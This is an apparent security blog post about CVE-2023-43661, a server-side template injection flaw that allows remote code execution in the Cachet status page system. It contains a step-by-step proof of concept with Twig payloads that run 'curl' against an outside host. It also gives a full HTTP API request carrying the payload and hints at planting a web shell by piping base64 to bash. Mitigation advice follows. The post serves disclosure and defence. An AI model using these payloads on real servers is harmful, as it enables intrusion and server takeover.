CVE-2023-43661: RCE bug in Cachet open-source status page system

In the realm of digital services, consistent communication with customers and stakeholders is pivotal. Organizations large and small rely on status pages to provide real-time updates about their systems and services, ensuring transparency and trust. Standing tall amongst status page systems is Cachet, an open-source marvel that is both powerful and flexible, enabling businesses to create customizable status pages that resonate with their brand’s ethos.

Recently, the digital community has been abuzz with discussions about CVE-2023-43661, which comes with a high CVSS score of 9.1. This particular vulnerability shines a spotlight on a critical flaw within Cachet – the possibility of remote code execution via server-side template injection (SSTI).

To understand the gravity, let’s delve a bit into SSTI. Typically, template engines construct web pages by blending static templates with dynamic data. However, when user input gets directly concatenated into a template instead of being fed as data, attackers find an opportunity. They can inject manipulative template directives, potentially gaining unprecedented control over the server. With server-side processing, the ramifications of such injections can be alarmingly vast.

In Cachet’s case, this vulnerability originates from its template functionality. This feature, which was designed to enhance customization, inadvertently provides malicious users with the capability to execute any code on the server. The flaw is accentuated due to ineffective filtration and the utilization of an older twig version.

The community appreciates transparency, and the technical nuances of this vulnerability have been diligently shared on Github’s security page. While the revelation is alarming, solutions are at hand.

PoC

1. Log in as a default user (Not an admin);
2. Create an incident with name slug1 and with content: {{ [‘curl yourhost.com’,”]|sort(‘system’) }} or with any other content for Remote code execution via the Twig, for instance: {{[0]|reduce(‘system’,’curl yourhost.com’)}};
3. Get an API token from your account settings (X-Cachet-Token);
4. Trigger remote code execution using the api route:

   POST /api/v1/incidents HTTP/1.1
   
   Host: myapp
   
   Cache-Control: max-age=0
   
   Upgrade-Insecure-Requests: 1
   
   User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
   
   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
   
   Accept-Encoding: gzip, deflate
   
   Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
   
   Cookie: XSRF-TOKEN=eyJpdiI6InZUVVpkRmx1VFlhcytVQkQ1Zk81b1E9PSIsInZhbHVlIjoiSlE0Tmt1cjVoRHFSOHBIR3RoYlAwS0dNZlVHbm02d0tWVW1ERVRvblZTTW1TMHV2MFJUYTNwQWQyZ3pQM1VlMyIsIm1hYyI6IjU4YzAxZjgyYWE4YTU4MTExMDQ3OGRhOTNlYThlZTYxMzI5YzBhMWVhM2RjYzA2ODgzMGVhMGQ5Njg2YTMyMjkifQ%3D%3D; laravel_session=eyJpdiI6IldZcHhMSjBYRmQzUXdGTTRQbGFQTWc9PSIsInZhbHVlIjoiSkRxWncxdWs3Y29ZcXVHMlJ0U2pVVVwvMGdvSUJNK2pEMnhsR2QzVnE1MmMxMWJxUm96K1VnalwvS1pYcXE2cGllIiwibWFjIjoiMDM0MGIxNjRlM2VhOGU5Mzg2OWVkYjZjNmJhY2JlMTE3OTdkMDRkZTQ1NzI5NTMzNzI4YjA5YTcwNzM2M2E5YyJ9
   
   Connection: close
   
   X-Cachet-Token: OeiLJ6G6kjsBXeyOo97z
   
   Content-Length: 109
   
   Content-type: application/json
   
   
   
   {"template":"slug1", "name":"{{ ['curl pwned.riven.pw','']|sort('system') }}", "status":2, "visible":1}
5. Obtain Remote Code Execution. You can also upload a web-shell using some base64 tricks with pipe to bash.

For those who rely on Cachet, mitigation steps are crucial:

1. Stay Updated: Ensure that TWIG is updated to its latest version.
2. Enhance Filtration: Implement rigorous filtration of user-controlled data by adhering to any safe pattern.
3. Leverage Sandboxed Mode: Switch to the sandboxed twig mode, adding an additional layer of protection.
4. Limit User Access: Prevent non-admin users from triggering this vulnerability, especially via the API endpoint.

CVE-2023-43661 is a serious security vulnerability that should be patched as soon as possible. If you are using Cachet, please upgrade to the latest version or mitigate the risk by following the steps outlined above.